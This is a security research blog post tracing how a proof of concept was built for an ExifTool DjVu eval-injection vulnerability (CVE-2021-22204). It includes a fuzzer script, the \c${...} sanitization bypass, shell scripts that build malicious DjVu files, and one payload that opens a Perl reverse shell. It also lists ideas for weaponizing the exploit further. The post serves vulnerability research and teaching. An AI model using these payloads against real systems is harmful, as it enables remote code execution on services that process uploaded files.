From Fix to Exploit: Arbitrary Code Execution for CVE-2021-22204 in ExifTool

CYBERSECURITY / 06.15.21 / Michael Zandi

This is a narrative walkthrough of how I (like many others) independently built a Proof of Concept (PoC) for CVE-2021-22204. Included in this journey are the dead-ends I reached, and my thought process as I went along. Most of this was done before other PoCs and writeups were published, but when I became aware of them, I happily took inspiration from these other reports in my own process.

Background

ExifTool is a Perl library and Command Line Interface (CLI) application for reading, writing, and editing metadata in a variety of image and document formats. For example, it can be used to remove identifying metadata from JPG images. It’s used by GitLab, which is how this issue was originally discovered, and likely many other web applications.

Here’s a snippet from the CVE-2021-22204 tracking page in NIST’s National Vulnerability Database (NVD):

Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image.

Additionally, a referenced email on the OSS-security mailing list says:

The bug can be triggered from a wide variety of valid file formats.

Interesting! We have arbitrary code execution in a library that may possibly be widely used, that is reachable from a variety of different kinds of input. One could imagine the danger this could pose for a web application that accepts user-uploaded images or documents.

Let’s see if we can figure out what’s going on here.

Initial Investigation

The vulnerability report for CVE-2021-22204 includes a link to a diff in GitHub for the fixed version for ExifTool. After reading the diff, or just reading other online commentary, we find the following change in the ParseAnt function in the DjVu Perl module, which is used to parse DjVu annotation fields:



-            # must protect unescaped "$" and "@" symbols, and "\" at end of string
-            $tok =~ s{\\(.)|([\$\@]|\\$)}{'\\'.($2 || $1)}sge;
-            # convert C escape sequences (allowed in quoted text)
-            $tok = eval qq{"$tok"};
+            # convert C escape sequences, allowed in quoted text
+            # (note: this only converts a few of them!)
+            my %esc = ( a => "\a", b => "\b", f => "\f", n => "\n",
+                        r => "\r", t => "\t", '"' => '"', '\\' => '\\' );
+            $tok =~ s/\\(.)/$esc{$1}||'\\'.$1/egs;

This code is part of a case that handles text wrapped in double-quote ” characters in ParseAnt. So, if an annotation was asdf(hjkl”1234”, this function would handle the string as 1234. There is recursion on the ( character as well as other handling, but this doesn’t seem to be part of the vulnerability.

Looking at the diff, we see that the old version did a search and replace on $tok to sanitize it, then ran an eval on $tok to implement handling of certain escapes like \n. However, the new version uses a search and replace to handle only the intended C escapes, and removes the eval entirely. From the vulnerability classification of incomplete sanitization, and the eval being removed, we can tell that we’ll want to focus on getting code execution here.

At its core, eval is very risky to use on uncontrolled input like this, so any code using an eval like this should be thoroughly audited, or better yet refactored to not require an eval at all.

Examining the Idiosyncrasies of Regex and Eval

Perl syntax and regexes can get a bit ugly. Here’s a syntax-incompatible breakdown of what’s happening:



$tok =~ # apply search/replace regex to $tok, saving modified version in $tok
 s # search/replace regex
     # syntax: s/match pattern/replace pattern/modifiers
     # (can use {} as pattern delimiters instead of / if we want)
 
 { \\(.) | ( [\$\@] | \\$ ) } # what to match, and capture groups in parentheses (if match, save input found in parentheses)
     # match any single character which is preceded by a '\', saving that character in capture group 1 OR
     # capture the following match in capture group 2:
     #    a '$' character OR
     #    a '@' character OR
     #    a '\' character at the end of the line (or before a trailing newline, thanks Jakub!)
 
 { '\\'.($2 || $1) } # what to replace each match with
     # IF there is a match THEN replace the matching text with
     # a '\' character followed by:
     #    capture group 2 if it exists ($ character, @ character, or '\' at end of line) OR
     #    capture group 1 (any character that was escaped by a '\')
     # (because of the matching regex, one of these must exist)
     
 sge; # modifiers
     # s: treat entire input as single line
     # g: match on any occurrence in input, not just first
     # e: eval the replace string

We should also point out the for (;;) loop before this regex that also handles some ” and \ characters, which is important for sanitization:



for (;;) {
    # get string up to the next quotation mark
    # this doesn't work in perl 5.6.2! grrrr
    # last Tok unless $$dataPt =~ /(.*?)"/sg;
    # $tok .= $1;
    my $pos = pos($$dataPt);
    last Tok unless $$dataPt =~ /"/sg;
    $tok .= substr($$dataPt, $pos, pos($$dataPt)-1-$pos);
    # we're good unless quote was escaped by odd number of backslashes
    last unless $tok =~ /(\\+)$/ and length($1) & 0x01;
    $tok .= '"';    # quote is part of the string
}

This section is unchanged in the patch, but still influences how input is parsed. Basically, it grabs the rest of the input string until the next ” which is not escaped. This is important because of how the eval is structured:



$tok = eval qq{"$tok"};

In Perl, string interpolation is done on strings within ” characters, but not on strings within ' characters. So ”my $string” would have the contents of $string inserted into it, while 'my $string' would not. To make it easier to have ” in your interpolated strings, you can use qq{ … }. This eval takes $tok, wraps it in ” to make it a string, and evaluates that string. This poses an interpolation risk if $tok contains ”, $, or @, so we filter those out ahead of time.

In short, this sanitization (nearly) makes sure that before we eval:

all $ characters are escaped
all @ characters are escaped
No unescaped ” characters to break out of qq{“$tok”}
All other escaped characters are preserved, like \n or \t.

While this might seem strict, there’s clearly still a gap here. Otherwise, there wouldn’t be a vulnerability.

Dead Ends and Misc. Tricks

There are the many different things I tried before hitting on a functioning bypass of the sanitization. In this section, we’ll discuss a variety of things I tried, and whether they were effective. I recommend following along by reading the most recent vulnerable version of the function here. This took me most of a week to work through.

First, I copied the vulnerable function into my own Perl script, so I could test against just the vulnerable code without worrying about the rest of ExifTool. This was useful for analyzing and understanding the root cause of the vulnerability. Using this test script, I tried the following things:

Manually trying different escape sequences

Because of the eval, far more escape sequences are processed than intended. For example, \x41 would produce an A character, and less well-known escapes like \U work as well. \c is one I didn’t previously know about, that handles “control” escape sequences. For example, \ch operates like Ctrl+h in a terminal, deleting the previous character. I tested and could verify that this affected our $tok string, but I couldn’t figure out how to use this to sneak any special characters past the sanitizing.

This `\c` escape ends up being the key, which wasn’t clear to me until later.

String interpolation without $ or @

I wasn’t able to find any escapes that didn’t require $ or @. Something like ${ …code… } seemed like our best bet at getting code execution. I was hoping something like backticks would work, but no luck.

Tricking it with ( recursion to combine two benign strings into an evil string

Even using ( to recurse, the eval only happens at the base case of strings within ” characters, not on combined results from recursively called functions.

Perl -T taint tracking

Perl supports a rudimentary taint tracking with -T, which sounds promising both as a security control, and as a way to analyze this bug. As is described in the documentation linked above:

You may not use data derived from outside your program to affect something else outside your program—at least, not by accident.

But running our test program with -T, all we really get is a warning that the eval is operating on tainted memory, which we already know. I was hoping that this feature would do some kind of analysis on the sanitization regex for me, but it’s a much simpler feature than that.

Perl regex debugging

Maybe I just don’t understand the regex well enough? We can debug the regex to see detailed info regarding how the state machine is compiled and processes input looking for matches. We can use -Mre=debug to enable this for an entire script, but this also debugs regexes we aren’t interested in. Instead, we can wrap just our regex of interest with use re 'debug'; before and no re 'debug'; after to debug only the code we’re interested in.

This does help us observe the regex as it runs on our input. However, it didn’t really help me find any magic characters that snuck past the regex match, or anything else that proved useful.

Fuzzing with raw ASCII/bytes

At this point, I felt pretty well stumped. I figured I’d just throw bytes and ASCII at it until I got something promising. Generating random bytes is easy enough, and generating ASCII isn’t much harder. It’s also easy to add in extra logic like “for ASCII characters, with a chance of 25% escape the ASCII character” or “have a 50% chance of generating a special character” to help generate strings that might be more interesting.

To fuzz properly we need to be able to replicate any findings. Saving all of the inputs we try is unfeasible, so we start our script with a print(“seed: “,rand(),”\n”); kind of call. Once we know the seed of a particular run, we can always replicate it by reusing the same seed, as long as we don’t change anything in how we use rand(). We also want to trim down on print statements and not use use warnings;. This way we can log interesting output on findings and performance using perl ./fuzz.pl &> fuzz_log.txt without bloating our output too much.

This is where using Git to track changes would be especially useful, since the seed used for a run is useless without the exact code executed in that run.

On its own, this didn’t really get anywhere, but it was very helpful later.

Differential fuzzing the vuln/fixed versions with Data::Compare

Since there was a change in the ParseAnt function, maybe we can compare how the vulnerable version behaves differently from the fixed one, to help us find what sort of input can lead to code execution? Let’s copy and paste the fixed function into our code as well. Then, we feed the same input to either version of ParseAnt, and compare the resulting data structures using the Data::Compare module from CPAN. We can also use the built-in Data::Dumper to print the data structures in a human-readable way.

Unfortunately, there are enough differences in how escapes are handled that we have a large number of inputs that produce different data structures. So, we don’t really learn anything from this.

The Solution

I got sick of the lack of progress hammering on ParseAnt. It seemed clear that there must be some way to get code to execute in the eval, but the only way I knew to do that required $ or @ characters which seemed likely to be rigorously escaped. It seemed that ” characters were also handled properly. There must be some magic input to un-escape that escaping, but I was out of ideas.

At this point, I broke it down into simple problems. Like, “Can we get code execution just on the eval?”. After manual experimentation, I determined that this was possible:



sub just_regex_eval($) {
    my $tok = shift;
    $tok =~ s{\\(.)|([\$\@]|\\$)}{'\\'.($2 || $1)}sge;
    # convert C escape sequences (allowed in quoted text)
    print("eval: ",join('',("\"",$tok,"\"")), "\n");
    $tok = eval qq{"$tok"};
}
my $tmp = <<'EOF';
";exit(41);"
EOF
just_regex_eval($tmp);
$ perl ./just_regex.pl 
main::ParseAnt() called too early to check prototype at ./just_regex.pl line 24.
eval: "";exit(41);"
"
Useless use of a constant ("") in void context at (eval 34) line 1.
$ echo $?
41

OK, that’s not too bad. We can just use ” to end the string and get directly executed. But if we use this against the full ParseAnt function, this breaks:



$ perl ./test_regex.pl 
main::ParseAnt() called too early to check prototype at ./test_regex.pl line 24.
eval: ";exit(41);"
XXX token after: ;exit(41);
$ echo $?
0

Using ” is all we need to do to get to our vulnerable code, so the only thing we added that could be breaking our simple exploit is the for (;;) loop handling ” characters. Instead of manually trying the full problem again, I figured I’d reuse my fuzzer components from earlier, but with minor modifications.

This kind of sanitizing seems like it would be bypassed with a few of the right characters in the right places, which should be doable with brute-force. If I just find the right characters to add on the beginning and end of my payload, I’ll eventually execute it. This will exit the fuzzer with a special exit code, so I know I struck gold rather than having crashed for some other reason.

Here’s the full source of my ‘lightweight’ fuzzer that wound up working, bizarre comments and all:



use strict;
#use warnings; # too much irrelevant output

use Data::Compare;
use Data::Dumper;

sub process_regex($)
{
	my $dataPt = shift;
	#pos($dataPt) = 0;

    return undef unless $$dataPt =~ /(\S)/sg;   # get next non-space character

	#my $tok = $$dataPt;
	my $tok = "";
	for (;;) {
		# get string up to the next quotation mark
		# this doesn't work in perl 5.6.2! grrrr
		# last Tok unless $$dataPt =~ /(.*?)"/sg;
		# $tok .= $1;

		my $pos = pos($$dataPt);
		return undef unless $$dataPt =~ /"/sg;
		$tok .= substr($$dataPt, $pos, pos($$dataPt)-1-$pos);
		# we're good unless quote was escaped by odd number of backslashes

		last unless $tok =~ /(\\+)$/ and length($1) & 0x01;
		$tok .= '"';    # quote is part of the string
	}

	# XXX: vulnerability here. We can get code execution in this eval
	# must protect unescaped "$" and "@" symbols, and "\" at end of string
	#use re 'debug';
	$tok =~ s{\\(.)|([\$\@]|\\$)}{'\\'.($2 || $1)}sge;
	#no re 'debug';
	# convert C escape sequences (allowed in quoted text)
	#print("eval: ",join('',("\"",$tok,"\"")), "\n");
	$tok = eval qq{"$tok"};
	print("[CRASH] error: ", @_) if @_; # Actually I misread documentation; should have used $@. Oops!

	return $tok;
}

# uniform random byte
sub rand_byte() {
	my $byte = int(rand(256));
	return chr($byte); # convert from int to character (byte)
}

# get a valid printable ASCII character (0x20-0x7e)
sub rand_ascii() {
	my $val = int(rand(0x7e - 0x20) + 0x20);
	return chr($val);
}

# Inputs:
# 0) length of request in bytes. May be larger due to escapes.
# 1) give raw bytes. If true, just throw bytes at us. If false, stick to printable ASCII
sub generate_string($$)
{
	my ($length, $raw_bytes) = @_;
	my $res = "";

	for (my $i=0; $i < $length; $i++) {
		if ($raw_bytes) {
			# actually let's just be dumb and only do bytes and see what happens
			# 1/4 chance of escaping this byte, just because that's 'interesting'
			if (int(rand(4)) == 0) {
				$res .= "\\";
			}
			$res .= rand_byte();
		} else {
			# printable ASCII
			my $v = rand_ascii();
			if(int(rand(4)) == 0) {
				# randomly escape some characters
				$res .= "\\";
			}
			if (int(rand(8)) == 0) {
				# randomly double some characters
				$res .= $v;
			}
			$res .= $v;
		}
	}
	
	return $res;
}

sub fuzz() {
	# the plain regex, without any handling of quotes, is exploitable by this: "\";print('asdf');\"";

	my $print_inputs = 0;

	# will execute in the easier version without quote handling, if wrap with "
	my $input = <<'HERE';
;exit(42);;
HERE
	$input =~ s/\s+$//;

	# idea: put random things before/after a `print('asdf')` and check output for 'asdf'
	# If we see it, we know we hit gold!

	$| = 1; # set stdout to autoflush (output properly synchronized with stderr)
	my $seed = srand(3587231692); # got execution with 3587231692 after ~1 hr
	print("[FUZZER] fuzzing with seed $seed\n");
	my $last_i = 0;
	my $last_timestamp = time();
	my $timestamp_start = $last_timestamp;

	# b >= a
	my $execspeed_a = 0;
	my $execspeed_b = 0;
	my $execspeed = 0;
	for (my $i = 0;; $i++) {
		# XXX generate input here!
		my $pre = generate_string(int(rand(6)), undef);
		my $post = generate_string(int(rand(6)), undef);

		my $data = join('',($pre, $input,$post));
		$data = join('',("\"",$data,"\"")); # only with extra " handling

		if ($i - $last_i >= 1000) {
			my $timestamp = time();
			if ($timestamp > $last_timestamp) {
				$execspeed_a = $execspeed_b;
				$execspeed_b = $i;
				$execspeed = $execspeed_b - $execspeed_a;
				$last_timestamp = $timestamp;
				print("[FUZZER] heartbeat $timestamp: ~$execspeed exec/s\n");

				# don't print a massive file until we're just about to strike gold
				if ($timestamp - $timestamp_start >= 4270) {
					$print_inputs = 1;
				}
			}
			$last_i = $i;
		}

		# XXX call vulnerable code here!
		#print("[FUZZER] input: $data\n");
		# let's try differential testing
		print(join('',("trying input: ", $data, "\n"))) if $print_inputs;
		my $res = process_regex(\$data);
	}
}

fuzz();

Running it and coming back after dinner, we see that it successfully finished. Lucky us!



$ perl ./fuzz_light.pl &> fuzz_log.txt
$ echo $?
42

Checking our log, we see a lot of interesting output before the magic combination that gets our code properly executing. If we hadn’t obtained the complete answer, these errors and warnings would still point us toward a functioning exploit:



...
[FUZZER] heartbeat 1620435137: ~76000 exec/s
Variable "@a" is not imported at (eval 956645) line 1.
[FUZZER] heartbeat 1620435138: ~77000 exec/s
...
trying input: "\R\c\@y;exit(42);;2"
Variable "@y" is not imported at (eval 334017354) line 1.

Interesting! It looks like \c\@y gets turned into @y and interpreted by the eval as a variable that doesn’t exist. At the end of our log, we find the gold nugget input that was properly executed, which used the same trick: "\%2\c${;exit(42);;*\}C]", or after we simplify it, "\c${exit(42)}".

It was at this moment that I realized I had read about this exact thing in the perlop documentation five days earlier. I had been using this to puzzle out the more obscure parts of Perl string interpolation:

Also, \c\X yields chr(28) . "X" for any X

Luckily chr(28), the “file separator” character in ASCII, doesn’t seem to cause problems with Perl’s string interpolation. What a useful coincidence! \c\$ would already look escaped to the regex, but become $. Likewise, \c$ becomes \c\$ which then becomes $. We can now sneak our magic interpolation characters into our eval and execute code.

Fuzzer Improvements in Hindsight

Here’s some ideas I had after the fuzzer worked, regarding how it could have found a working input faster:

Chance to Nest Input
Have some chance to generate matching nesting characters in prepended/appended generated strings. If { appears in a prepended string, have a chance to put } in an appended string.
More Intelligent Escaping
Instead of randomly escaping any ASCII character with only \, have chances to escape with \c, \x, and other escapes that take parameters.
Smarter Random Number Generator (RNG) State Management
Periodically dump RNG state to a file to reduce overhead if we want to replicate part of a run. This way, instead of only being able to restart from the beginning, we can restart shortly before we find an interesting input.

Making a DjVu File

All that’s left to do now is to wrap this payload in a DjVu file so that it will get processed correctly. I initially tried this with tools like djvused to manually set annotations, but I couldn’t preserve the escaping I needed. It seemed that djvused was escaping characters in my string before placing it in the file. This must be why ExifTool is handling c-style escapes in the first place. It also never seemed to be creating uncompressed ANTa chunks, just compressed ANTz chunks, so simple hex-editing wouldn’t be easy either.

Sure enough, going through the source of djvulibre and how it saves annotations, the contents are passed through a make_c_string function that appears to escape certain characters. Because using djvused seemed easy, I thought I’d just build a custom libdjvulibre.so without the escaping and use my modified version with LD_LIBRARY_PATH.

At this point I became aware of the first public PoCs and write-ups. I found that Jakub Wilk's PoC was much simpler, and a better starting point for my own PoC.

Here’s the quick and dirty PoC I wound up with, using Jakub’s much simpler method of creating a DjVu file, with the \c bypass I found:



$ cat my_poc.sh 
#!/bin/bash
# let's use jakub's technique to build the file, but use \c
printf 'P1 1 1 0' > mine.pbm
cjb2 mine.pbm mine.djvu
# fuzzer find: "\%2\c${;exit(42);;*\}C]"
printf 'ANTa\0\0\0\40(xmp "\c${exit(42)};#          "' >> mine.djvu
echo "created malicious mine.djvu"

Indeed, this works against ExifTool 12.23:



$ perl exiftool/exiftool mine.djvu &> /dev/null
$ echo $?
42

We can get a more exciting PoC working by finding a Perl reverse shell and manually replacing variables with their values, since $ within our code wrapped in ${ … } can’t be unescaped with our \c trick. It isn’t interpolated since it’s code, rather than a string:



#!/bin/bash
printf 'P1 1 1 0' > revshell.pbm
cjb2 revshell.pbm revshell.djvu
printf 'ANTa\0\0\0\xd3' >> revshell.djvu
cat <<'EOF' >> revshell.djvu
(xmp "\c${use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(1337,inet_aton('localhost')))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};};#"
EOF
echo "created malicious revshell.djvu"

Extra Credit

Here are some thoughts I had on weaponizing this PoC further, but I didn’t try any of these.

Automate transforming Perl payloads to be suitable for use within \c${ … }.
Apply obfuscation/perlgolf tricks to make analysis even more annoying.
Fork in the payload to avoid hanging the victim process.
Build tooling to automate creating malicious DjVu files.
Analyze ExifTool to determine what other code paths there are to reach the vulnerable code with more common file formats like jpg or pdf.

Other PoCs and Writeups

Here is the writeup from the original discoverer of the vulnerability. The writeup details how they found it, their thought process at each step, and how they found multiple ways to exploit the vulnerability from different file formats.
Here’s a much simpler PoC by Jakub Wilk, the first public PoC I’m aware of. Short, sweet and to the point, it uses \n to escape sanitizing rather than \c.
This writeup on bricked.tech also uses a fuzzer to find a sanitization bypass, using Python. It finds the \n handling like Jakub’s PoC does, rather than \c handling. It’s also shorter and simpler than this writeup.
Here is a (now merged) pull request for Metasploit to add an exploit for this CVE, apparently using the \c trick rather than \n, and with other file formats like JPG.

For similar articles and news delivered straight to your inbox, subscribe to the BlackBerry Blog.

About Michael Zandi

Software Engineer Associate of Applied Research at BlackBerry.

Back